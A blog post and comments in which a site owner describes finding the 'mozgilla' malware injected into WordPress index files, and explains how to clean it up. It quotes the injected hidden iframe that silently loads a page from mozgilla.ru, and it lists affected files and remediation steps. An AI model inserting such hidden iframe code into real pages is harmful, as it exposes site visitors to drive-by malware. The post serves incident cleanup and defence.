mozgilla hack – index.* files corrupted

This just recently happened to me (last night actually), I think my host got hacked. I have no idea why or how.

OK, so straight to the point. This morning my blog – a wordpress installation – was dead. I was getting whether an “access denied” or “you don’t have permission to access…”. First I thought that the blog got screwed somehow and I tried to go into the admin panel (e.g. georgezamfir.com/wp-admin/)… aaand I got the same error code. Crap. At this point I was clueless, I searched online for any netfirms issues, I thought they messed up something, nothing.

All right, back to basics, I FTP-ed to my host to take a look at the files and this is when I realized that all my index.* (index.php, index.html, index.htm, etc) files were screwed. There were no permissions set and they all contained some code linking to mozgilla.ru – that code was not familiar to me.  Duh, I don’t use iframes. There isn’t much online on this thing except for this page: badwarebusters.org/main/itemview/11308.

I was having the exact same code in my files:
<iframe frameborder=”0″ onload=”if (!this.src){ this.src=’http://mozgilla.ru:8080/index.php’; this.height=’0′; this.width=’0′;}” >klsgawbozfesywooikgbcetdnwaubys</iframe>
However, in the .php files the code above was at the very end of the files but in the .html files the code was right after the <body> tag.

Now, as mentioned in the article above the code could be “injected by script” directly inside the files or through .htacess when the pages are requested. In my case the code was injected directly in the files (thank god) and I manually removed the code.

For wordpress installations/blogs, the following files (remember to set the permissions first, otherwise you won’t be able to edit the files) are being affected:
/index.php
/wp-admin/index-extra.php
/wp-admin/index.php
/wp-content/index.php
/wp-content/themes/index.php
/wp-content/themes/{all themes folders}/index.php (I simply removed the themes I didn’t need
/wp-includes/default-filters.php
/wp-includes/default-widgets.php

Also, in my case I didn’t have to change the .htaccess (in the wordpress folder) as it should look something like the below code. You need these lines for the permalinks, don’t delete them.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

So, this is the (manual) way of saving your website from the pesky mozgilla hack:

  • find the “corrupted” files (easy, sort by date – recently modified files have the code),
  • set the right permissions (chmod 644 index.php) and
  • manually remove the code from the files.

I hope this helps others as I was going nuts trying to find the solution. And btw, I found the solution but I still don’t know what the problem is. However, here are some tips from Google on this subject.

4 Comments to “mozgilla hack – index.* files corrupted”

  1. Thomas J. Raef

    You may have found your files with the wrong permissions, but they were set that way by the hackers.

    The way this works is that a PC with FTP access to a website gets a virus. I know, everyone has anti-virus software these days. However, anti-virus vendors are faced with 30,000 new viruses everyday so they started creating more generic signatures. These signatures are ill-prepared for the newer viruses that hackers claim are FUD (Fully Un Detectable).

    These viruses steal FTP login credentials, send them to a server which carries out the website infection with valid FTP credentials. When “they” upload their infected files, the permissions are set to 777. This makes it easier for them to modify later on if you remove their work the first time.

    So, without scanning all PCs with FTP access for viruses, the website is still vulnerable to re-infection.

    First, change all FTP passwords. Then, because these viruses also know how to evade detection of the currently installed anti-virus software, it’s recommended to use something different. Many have had good success with AVG, Avast or Avira. Select one of those and use it with Malwarebytes – on every PC with FTP access to the website.

    Also, keep in mind that while your specific infection showed the mozgilla.ru domain, many other domains are used as well. The same infectious code, but a different domain.

    I just thought I’d share my experience in dealing with this for so many site owners.

  2. George

    Well, my index.* files didn’t have any permissions ( e.g. ———- 1 668 552 3669 Oct 30 18:16 index.php), if it were 777 it’d have been easier for me to figure it out. But it had no permissions and I couldn’t edit them… until I set my own permissions again.

    Anyhow, you’re right in all other respects. Thanks for the info.

  3. Christian Louboutin Shoes

    Thank you for useful info. :-)

  4. Ashleymsm

    Your site is like a blonde with a brain. I like it. All jokes apart, vrey informative post and equally impressive design.

Leave a Reply